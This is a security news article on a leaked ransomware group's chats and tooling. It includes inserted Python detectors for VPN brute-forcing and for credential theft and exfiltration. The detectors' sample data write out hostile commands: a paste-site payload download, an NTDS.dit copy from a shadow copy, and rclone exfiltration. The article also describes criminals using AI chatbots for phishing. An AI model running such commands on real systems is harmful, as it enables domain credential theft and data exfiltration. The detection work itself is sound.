GBHackers

Gentlemen Ransomware Exploits Fortinet Flaws, AI, and Custom C2 Tools


A newly analyzed leak tied to The Gentlemen ransomware group reveals how modern ransomware operations are evolving in structure and tooling while relying on the same proven intrusion techniques seen over the past four years.

The leak also highlights operator continuity across major ransomware brands. A threat actor known as “Tinker” appears across Conti (2022), Black Basta (2025), and now The Gentlemen (2026), maintaining the same role focused on phishing, negotiation, and credential operations.

Shared infrastructure, including the Matrix server bestflowers247.online, further supports attribution overlap between these groups, reinforcing the pattern that ransomware actors rebrand rather than retire.

Despite organizational changes, initial access techniques remain largely unchanged. The Gentlemen heavily relied on Fortinet edge devices, with at least 81 references to FortiGate systems in the chat logs.

The group explicitly discussed exploiting CVE-2024-55591, a FortiOS authentication bypass vulnerability. In parallel, brute-force activity targeting approximately 1,000 Fortinet VPN instances was observed, often using weak or reused credentials such as “gentlemen25” and “Gentlemen25.”
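The brute-force pattern described above leaves a distinctive trail in FortiGate event logs: a burst of SSL-VPN login failures from one source across many usernames, sometimes followed by a successful tunnel from that same source. The following detection script is an added example written for this page; it is not Vectra AI's or the group's code. The log lines are constructed (addresses, users and timestamps are invented), the field names follow FortiOS event logs, and treating action="tunnel-up" as the success marker is an assumption about the log schema.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in FortiGate key=value syslog style. The field names
# (date, time, subtype, action, remip, user, reason) follow FortiOS event logs;
# the addresses, usernames and timestamps are invented for this example and are
# not taken from the leak. Using action="tunnel-up" as the success marker is an
# assumption about the log schema; adjust it to the actions your firmware emits.
SAMPLE_LOGS = [
    'date=2026-05-03 time=02:14:01 type="event" subtype="vpn" action="ssl-login-fail" remip=203.0.113.7 user="admin" reason="sslvpn_login_permission_denied"',
    'date=2026-05-03 time=02:14:02 type="event" subtype="vpn" action="ssl-login-fail" remip=203.0.113.7 user="jsmith" reason="sslvpn_login_permission_denied"',
    'date=2026-05-03 time=02:14:04 type="event" subtype="vpn" action="ssl-login-fail" remip=203.0.113.7 user="mlee" reason="sslvpn_login_permission_denied"',
    'date=2026-05-03 time=02:14:05 type="event" subtype="vpn" action="ssl-login-fail" remip=203.0.113.7 user="backup" reason="sslvpn_login_permission_denied"',
    'date=2026-05-03 time=02:14:07 type="event" subtype="vpn" action="ssl-login-fail" remip=203.0.113.7 user="vpnuser" reason="sslvpn_login_permission_denied"',
    'date=2026-05-03 time=02:14:09 type="event" subtype="vpn" action="ssl-login-fail" remip=203.0.113.7 user="svc_scan" reason="sslvpn_login_permission_denied"',
    'date=2026-05-03 time=02:15:10 type="event" subtype="vpn" action="tunnel-up" remip=203.0.113.7 user="svc_scan"',
    'date=2026-05-03 time=09:00:00 type="event" subtype="vpn" action="ssl-login-fail" remip=198.51.100.4 user="bob" reason="sslvpn_login_permission_denied"',
    'date=2026-05-03 time=09:00:30 type="event" subtype="vpn" action="tunnel-up" remip=198.51.100.4 user="bob"',
    'date=2026-05-03 time=09:01:00 type="event" subtype="system" action="login" user="admin"',
]

# key=value pairs; quoted values may contain spaces, unquoted ones may not
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_kv(line):
    """Parse one FortiGate key=value line into a dict of strings."""
    out = {}
    for m in KV_RE.finditer(line):
        out[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return out


def burst_size(times, window):
    """Largest number of events from one source inside any span of length `window`."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def analyze(lines, window=timedelta(minutes=10), fail_threshold=5, spray_threshold=3):
    """Return {remip: finding} for sources whose failure burst reaches fail_threshold."""
    fails, successes = defaultdict(list), defaultdict(list)
    for line in lines:
        rec = parse_kv(line)
        if rec.get("subtype") != "vpn" or "remip" not in rec:
            continue
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        entry = (ts, rec.get("user"))
        if rec.get("action") == "ssl-login-fail":
            fails[rec["remip"]].append(entry)
        elif rec.get("action") == "tunnel-up":
            successes[rec["remip"]].append(entry)

    findings = {}
    for ip, events in fails.items():
        burst = burst_size([t for t, _ in events], window)
        if burst < fail_threshold:
            continue
        users = {u for _, u in events}
        finding = {
            "failures_in_window": burst,
            "distinct_users": len(users),
            # many usernames from one source means a short password list is being
            # sprayed, which is exactly what weak or reused passwords reward
            "password_spray": len(users) >= spray_threshold,
            "success_after_failures": None,
        }
        # a tunnel established shortly after the burst is the finding to escalate on
        for s_ts, s_user in successes.get(ip, []):
            if any(timedelta(0) <= s_ts - t <= window for t, _ in events):
                finding["success_after_failures"] = s_user
                break
        findings[ip] = finding
    return findings


if __name__ == "__main__":
    for ip, finding in analyze(SAMPLE_LOGS).items():
        print(ip, finding)
```

On the constructed input only 203.0.113.7 is reported: six failures in eight seconds across six usernames and a tunnel for svc_scan a minute later. The single failure from 198.51.100.4 followed by a success is the normal typo-then-login pattern and stays below the threshold. Tune the window and thresholds to your own baseline before alerting on it.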

This mirrors earlier activity from Black Basta and Conti, where exploitation of edge devices and known vulnerabilities consistently enabled access.

Artificial intelligence has become embedded in operations, but not in the way often assumed. Instead of generating malware, actors are using AI tools such as ChatGPT and Claude for social engineering, scripting, and data processing.

Internal conversations show AI being used to craft phishing messages, automate victim communication, and assist with code translation for malware variants.

According to Vectra AI, the leak, released in May 2026 and analyzed by Ransom-ISAC, contains 3,366 internal Rocket.Chat messages along with infrastructure artifacts, offering insight into one of the most active ransomware crews of the year.

The group also experimented with uncensored large language models hosted on platforms like Hugging Face and leveraged rented GPU infrastructure for analyzing stolen data.

The four leaks at a glance (Source: Vectra AI).

However, operators expressed mixed confidence in AI outputs, indicating it remains a support tool rather than a primary capability.

Tooling has evolved more significantly. The Gentlemen replaced traditional frameworks like Cobalt Strike with a custom command-and-control platform known as G-BOT.

This framework supports SOCKS5 tunneling and uses public file-sharing services such as temp.sh and 0x0.st for payload delivery.

Earlier development efforts by Black Basta, such as the Breaker C2 framework with TCP, DNS, and ICMP communication channels, demonstrate a broader trend toward proprietary tooling to evade detection.

Endpoint detection and response systems are no longer avoided but actively bypassed. Techniques referenced in the leak include NTDLL unhooking, direct syscall execution, ETW patching, and manipulation of debug registers (hardware breakpoints used to divert hooked functions without writing to their code, which defeats integrity checks on the hooked bytes).

One operator claimed that tools capable of disabling leading EDR solutions cost around $5,000, suggesting a mature underground market for defensive evasion capabilities.

The Gentlemen (May 2026) (Source: Vectra AI).

The leak also exposes a growing focus on hypervisor-level attacks. The Gentlemen targeted Hyper-V environments directly, encrypting virtual machine storage at the host level.

Because the encryption runs on the Hyper-V host against the virtual disk files rather than inside the guests, agents deployed only in the virtual machines never see it and endpoint security stays blind to the ongoing encryption. The host itself therefore needs the same EDR coverage and monitoring of its storage paths as any other server.

Post-exploitation activity remains consistent with historical ransomware operations. Credential harvesting tools such as LummaC2, Phemedrone Stealer, and DumpBrowserSecrets were used to extract browser-stored credentials.

Domain compromise was achieved by lifting NTDS.dit from a Volume Shadow Copy backup (together with the SYSTEM registry hive needed to decrypt it), which yields the password hashes of every domain account. Data exfiltration followed a familiar pattern, using rclone to transfer stolen data via a Synology NAS staging server to MEGA cloud storage.

CVEs mentioned by Black Basta (Source: Vectra AI).

One exposed configuration showed active exfiltration to IP 193.228.128.2 over port 2222 using the account “d0wnloAd1.”
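The post-exploitation chain above (shadow copy, NTDS.dit, rclone to a cloud remote or a non-standard-port SFTP host) and the payload delivery through temp.sh and 0x0.st described earlier all show up as process command lines. The following triage script is an added example written for this page, not Vectra AI's or the group's code: it runs a small rule set over process-creation records and labels hosts where the credential-theft or staging chain is present. The records are constructed in the shape of Sysmon Event ID 1 / Windows 4688 data; the account name d0wnloAd1 is the one quoted above, while 192.0.2.10 is a documentation-range placeholder and the 0x0.st path is invented.

```python
import re

# Constructed process-creation records (host, user, command line), invented for
# this example and not taken from the leak. d0wnloAd1 is the account the article
# quotes; 192.0.2.10 is a documentation-range placeholder, the 0x0.st path is made up.
SAMPLE_EVENTS = [
    {"host": "WS17", "user": "CORP\\alice",
     "cmd": r'powershell.exe -nop -w hidden -c "iwr https://0x0.st/AbCd.bin -OutFile C:\ProgramData\svc.exe"'},
    {"host": "DC01", "user": "CORP\\svc_backup", "cmd": r"vssadmin.exe create shadow /for=C:"},
    {"host": "DC01", "user": "CORP\\svc_backup",
     "cmd": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit C:\Temp\n.dat"},
    {"host": "DC01", "user": "CORP\\svc_backup", "cmd": r"reg.exe save HKLM\SYSTEM C:\Temp\sys.hiv"},
    {"host": "FS02", "user": "CORP\\jsmith", "cmd": r"rclone.exe copy D:\Shares\Finance mega:exfil --transfers 16 -q"},
    {"host": "FS02", "user": "CORP\\jsmith",
     "cmd": r"rclone.exe copy D:\Shares\HR sftp:/upload --sftp-host 192.0.2.10 --sftp-port 2222 --sftp-user d0wnloAd1"},
    {"host": "WS17", "user": "CORP\\alice", "cmd": r"vssadmin.exe list shadows"},
    {"host": "WS17", "user": "CORP\\alice", "cmd": r"notepad.exe C:\Users\alice\notes.txt"},
]

# (rule name, tactic, compiled pattern over the command line)
RULES = [
    ("paste_site_download", "delivery",
     re.compile(r"\b(temp\.sh|0x0\.st)\b", re.I)),
    ("shadow_copy_created", "credential_access",
     re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I)),
    ("ntds_from_shadow", "credential_access",
     re.compile(r"HarddiskVolumeShadowCopy\d+.*\\ntds\.dit\b", re.I)),
    ("ntdsutil_ifm", "credential_access",
     re.compile(r"\bntdsutil(\.exe)?\b.*\bifm\b", re.I)),
    ("system_hive_saved", "credential_access",
     re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\SYSTEM\b", re.I)),
    ("rclone_cloud_remote", "exfiltration",
     re.compile(r"\brclone(\.exe)?\b.*\b(mega|s3|b2|drive|dropbox|box):", re.I)),
    ("rclone_sftp", "exfiltration",
     re.compile(r"\brclone(\.exe)?\b.*\bsftp:", re.I)),
    # SFTP on anything but port 22, e.g. the 2222 seen in the leaked configuration
    ("nonstandard_ssh_port", "exfiltration",
     re.compile(r"--sftp-port\s+(?!22\b)\d+", re.I)),
]


def match_rules(cmd):
    """Names of every rule whose pattern occurs in one command line."""
    return [name for name, _tactic, rx in RULES if rx.search(cmd)]


def triage(events):
    """Aggregate rule hits per host and label the chains described in the article."""
    per_host = {}
    for ev in events:
        hits = match_rules(ev["cmd"])
        if not hits:
            continue
        h = per_host.setdefault(ev["host"], {"rules": set(), "users": set()})
        h["rules"].update(hits)
        h["users"].add(ev["user"])

    verdicts = {}
    for host, h in per_host.items():
        rules = h["rules"]
        verdicts[host] = {
            "rules": sorted(rules),
            "users": sorted(h["users"]),
            # NTDS.dit copied out of a shadow copy (or dumped with ntdsutil IFM)
            # is the step that turns a foothold into full domain credential access
            "domain_credential_theft": bool(rules & {"ntds_from_shadow", "ntdsutil_ifm"}),
            # rclone pointed at a cloud remote or an SFTP host is the staging/exfil step
            "staged_exfiltration": bool(rules & {"rclone_cloud_remote", "rclone_sftp"}),
            "payload_from_paste_site": "paste_site_download" in rules,
        }
    return verdicts


if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_EVENTS).items():
        print(host, verdict)
```

On the constructed records DC01 is labelled for domain credential theft, FS02 for staged exfiltration (with the non-standard SFTP port noted), and WS17 only for the paste-site download; "vssadmin list shadows" on its own is not flagged. Command-line rules like these require process auditing with command-line capture enabled (Sysmon, or 4688 with the command-line option), and they are a triage aid rather than a complete detection: the rclone rule, for instance, is blind to a binary that has been renamed.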

Overall, the Gentlemen leak reinforces a critical pattern in ransomware operations: innovation is concentrated in evasion, infrastructure, and scale, while core intrusion methods remain unchanged.

Exploiting edge devices, harvesting credentials, and leveraging trusted tools for exfiltration continue to succeed, indicating that defensive gaps persist despite years of public disclosures and threat intelligence reporting.
